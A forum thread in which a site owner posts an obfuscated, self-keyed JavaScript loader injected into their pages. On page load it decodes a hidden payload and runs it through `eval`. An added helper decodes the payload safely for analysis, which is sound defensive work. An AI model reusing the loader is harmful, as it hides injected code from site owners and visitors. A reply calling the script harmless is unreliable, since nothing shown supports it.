  1. #1
    New to the CF scene

    purpose of this script.

    One of my associates who has root user to my site's FTP had a spyware infection and it managed to embed a script on my site. I traced the script all the way back to this function. I am not an expert in JavaScript but it looks like all the data is actually passed to this function and is decrypted in some way. Can you guys try to help me modify it so I can figure out what it was actually designed to do?

    Here is the function:

    Code:
    function tYFG62c1F(IDkvG4nkn, dRBgV5JDW) {
        var jA74Ll3N2 = arguments.callee;
        var R7y5DmyJp = location.href;
        jA74Ll3N2 = jA74Ll3N2.toString();
        jA74Ll3N2 = jA74Ll3N2 + R7y5DmyJp;
        var V5bXU3HS2 = jA74Ll3N2.replace(/\W/g, "");
        V5bXU3HS2 = V5bXU3HS2.toUpperCase();
        var JGa3J60pA = 4294967296;
        var E6QdjiN2e = new Array;
        for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 256; ko5Q7Mpq8++) {
            E6QdjiN2e[ko5Q7Mpq8] = 0;
        }
        var G8tM51Cp4 = 1;
        for(var ko5Q7Mpq8 = 128; ko5Q7Mpq8; ko5Q7Mpq8 >>= 1) {
            G8tM51Cp4 = G8tM51Cp4 >>> 1 ^ (G8tM51Cp4 & 1 ? 3988292384 : 0);
            for(var aH1heD5Rg = 0; aH1heD5Rg < 256; aH1heD5Rg += ko5Q7Mpq8 * 2) {
                var hug7K8d20 = ko5Q7Mpq8 + aH1heD5Rg;
                E6QdjiN2e[hug7K8d20] = E6QdjiN2e[aH1heD5Rg] ^ G8tM51Cp4;
                if (E6QdjiN2e[hug7K8d20] < 0) {
                    E6QdjiN2e[hug7K8d20] += JGa3J60pA;
                }
            }
        }
        var y54Ix84S6 = JGa3J60pA - 1;
        for(var u033a3IVn = 0; u033a3IVn < V5bXU3HS2.length; u033a3IVn++) {
            var lCaM67h4s = (y54Ix84S6 ^ V5bXU3HS2.charCodeAt(u033a3IVn)) & 255;
            y54Ix84S6 = (y54Ix84S6 >>> 8) ^ E6QdjiN2e[lCaM67h4s];
        }
        y54Ix84S6 = y54Ix84S6 ^ (JGa3J60pA - 1);
        if (y54Ix84S6 < 0) {
            y54Ix84S6 += JGa3J60pA;
        }
        y54Ix84S6 = y54Ix84S6.toString(16).toUpperCase();
        while(y54Ix84S6.length < 8) {
            y54Ix84S6 = "0" + y54Ix84S6;
        }
        var E8nIyBM1p = new Array;
        for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < 8; ko5Q7Mpq8++) {
            E8nIyBM1p[ko5Q7Mpq8] = y54Ix84S6.charCodeAt(ko5Q7Mpq8);
        }
        var u4M1b5qiL = "";
        var oQEs4S3Q6 = 0;
        for(var ko5Q7Mpq8 = 0; ko5Q7Mpq8 < IDkvG4nkn.length; ko5Q7Mpq8 += 2){
            var hug7K8d20 = IDkvG4nkn.substr(ko5Q7Mpq8, 2);
            alert(hug7K8d20);
            var k3EBh8S75 = parseInt(hug7K8d20, 16);
            var aQ6Es8oMa = k3EBh8S75 - E8nIyBM1p[oQEs4S3Q6];
            if(aQ6Es8oMa < 0) {
                aQ6Es8oMa = aQ6Es8oMa + 256;
            }
            u4M1b5qiL += String.fromCharCode(aQ6Es8oMa);
            if(oQEs4S3Q6 + 1 == E8nIyBM1p.length) {
                oQEs4S3Q6 = 0;
            } else {
                oQEs4S3Q6++;
            }
        }
        var AvEJlrD0g = 0;
        try {
            eval(u4M1b5qiL);
        } catch(e) {
            AvEJlrD0g = 1;
        }
        try {
            if (AvEJlrD0g) {
                window.location = "/";
            }
        } catch(e) {}
    }

    And here is the way it was called. *By the way, please do not attempt to execute it unless you have an idea of what it does, because I know it was possibly supposed to be malicious, and that is why I want to know what it did or could have done to my site's visitors.

    For the call:
    Code:
    <body onload="tYFG62c1F('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')">
    If anyone can help me modify it to figure out what it was passing to the function to determine its purpose it would be a load off of my chest.
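
An added example, not part of the original post and not any participant's code: a Node.js re-implementation of the posted routine's decoding steps that returns the decoded text instead of passing it to `eval`. It reads the routine's table loop as standard CRC-32; the helper names, the stand-in source and URL, and the sample payload are constructed for illustration.

```javascript
// Added analysis helper, not code from the thread. Run with Node.js (no DOM, no eval).

// CRC-32, reflected, polynomial 0xEDB88320 (the 3988292384 constant in the posted code).
function crc32Hex(text) {
  const table = new Uint32Array(256);
  for (let n = 0; n < 256; n++) {
    let c = n;
    for (let k = 0; k < 8; k++) c = c & 1 ? (c >>> 1) ^ 0xedb88320 : c >>> 1;
    table[n] = c >>> 0;
  }
  let crc = 0xffffffff;
  for (let i = 0; i < text.length; i++) {
    crc = (crc >>> 8) ^ table[(crc ^ text.charCodeAt(i)) & 0xff];
  }
  return ((crc ^ 0xffffffff) >>> 0).toString(16).toUpperCase().padStart(8, "0");
}

// Key = CRC-32 hex of (function source + page URL), non-word chars removed, uppercased.
function deriveKey(functionSource, pageUrl) {
  return crc32Hex((functionSource + pageUrl).replace(/\W/g, "").toUpperCase());
}

// Subtract the repeating 8-character key from each hex byte, modulo 256.
function decodeWithKey(hexPayload, key) {
  let out = "";
  for (let i = 0; i < hexPayload.length; i += 2) {
    const byte = parseInt(hexPayload.slice(i, i + 2), 16);
    const k = key.charCodeAt((i / 2) % key.length);
    out += String.fromCharCode((byte - k + 256) % 256);
  }
  return out; // returned for reading; never passed to eval
}

function decodePayload(hexPayload, functionSource, pageUrl) {
  return decodeWithKey(hexPayload, deriveKey(functionSource, pageUrl));
}

// Constructed sample, not the payload from the thread: stand-in source and URL strings.
const SAMPLE = { source: "12-34", url: "56/789", hex: "B9A3B854947663717271" };
console.log("key:", deriveKey(SAMPLE.source, SAMPLE.url));
console.log("decoded:", JSON.stringify(decodePayload(SAMPLE.hex, SAMPLE.source, SAMPLE.url)));
```

Because the key is derived from the function's own source text plus `location.href`, a real payload only decodes with the function exactly as it was served (any added or removed word characters change the key) and the exact URL of the infected page. With the wrong key the output is unreadable bytes, which in the posted routine typically fails in `eval` and ends in the redirect to "/".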

  • #2
    Regular Coder ninnypants
    Go through and delete every instance of it. It was probably messing with links on your site, but without hours of running it and going through all the gibberish it's impossible to tell.

  • #3
    New to the CF scene
    As long as it didn't somehow infect anyone with spyware using known vulnerabilities, everything should be alright. Yeah, I deleted it but it still kinda sucks.

  • #4
    Senior Coder rnd me
    It doesn't do anything harmful, just annoying.

    Most importantly, it doesn't "phone home", so privacy and security should not be affected.
    my site (updated 13/9/26)
    BROWSER STATS [% share] (2014/9/03) IE7:0.1, IE8:4.6, IE11:9.1, IE9:3.1, IE10:3.0, FF:17.2, CH:46, SF:11.4, NON-MOUSE:38%